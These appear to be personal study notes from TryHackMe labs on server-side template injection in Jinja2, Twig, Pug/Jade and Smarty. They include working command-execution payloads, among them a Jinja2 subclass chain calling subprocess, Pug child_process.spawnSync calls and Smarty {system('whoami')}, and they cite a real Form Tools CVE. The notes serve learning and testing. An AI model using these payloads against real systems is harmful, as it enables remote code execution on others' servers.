SSTI

My notes on Server Side Template Injection taken while solving the SSTI walkthroughs on TryHackMe.

Introduction

Occurs when a user input is injected in the template engine of an app. DoS, privilege escalation, RCE are several security issues that can occur here. SSTI vulnerabilities are found in websites which use template engines to generate dynamic content.

For example, Jinja2 is a template engine used in Flask applications.

SSTI is a server side exploit.

Template Engines

Jinja2

Popular in Python applications and used widely with Django and Flask frameworks. It uses {{ }} to evaluate expressions. If the input is not sanitized or filtered properly, malicious expressions can be crafted and executed. For example:

{{"".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output("ls")}}

If we want to use arguments with the command we will have to use a list inside subprocess.check_output.

subprocess.check_output(['ls', '-la'])

Twig

Default template engine for symfony in PHP

Pug/Jade

Known for its clean and clear HTML templating syntax and popular among Node.js developers. If we want to execute system commands then we can use the following.

#{root.process.mainModule.require("child_process").spawnSync('ls').stdout}

In order to use arguments with the commands we have to do the following with spawnSync.

spawnSync('ls', ['-la'])

It's just how spawnSync works. If you want to read a file, then the following payload will be used.

#{root.process.mainModule.require('child_process').spawnSync('cat', ['7f58571b42d8c477a2f3efa69a681ac3.txt']).stdout};

Smarty

Used in PHP and can execute functions within templates which can make the website prone to SSTI. To check if this template engine is vulnerable to SSTI, use {"Hello"|upper} payload. If HELLO is returned in uppercase then that indicates that the template is vulnerable. You can also execute system commands using {system("")} . For example {system("whoami")} .

Syntax

Jinja2 and Twig have a similar syntax but different behaviour. Using {{7*'7'}} in Twig will give the output as 49 whereas doing the same will give 7777777 in Jinja2.

Jade uses #{} which is a JS expression. For example, using #{7*7} will return 49 in the output. Cherry on top, Jade can also execute JavaScript functions within the templates.

Real CVE Example

Form Tools 3.1.1 had a Smarty engine based SSTI vulnerability in the page title of a user's account information on /clients/account/index.php . Read more about it here https://vuldb.com/?submit.372318. The TryHackMe SSTI room has a good demonstration of this vulnerability.

PreviousExploitation NextExample 1

Last updated 1 month ago

hashtagIntroduction

hashtagTemplate Engines

hashtagJinja2

hashtagTwig

hashtagPug/Jade

hashtagSmarty

hashtagSyntax

hashtagReal CVE Example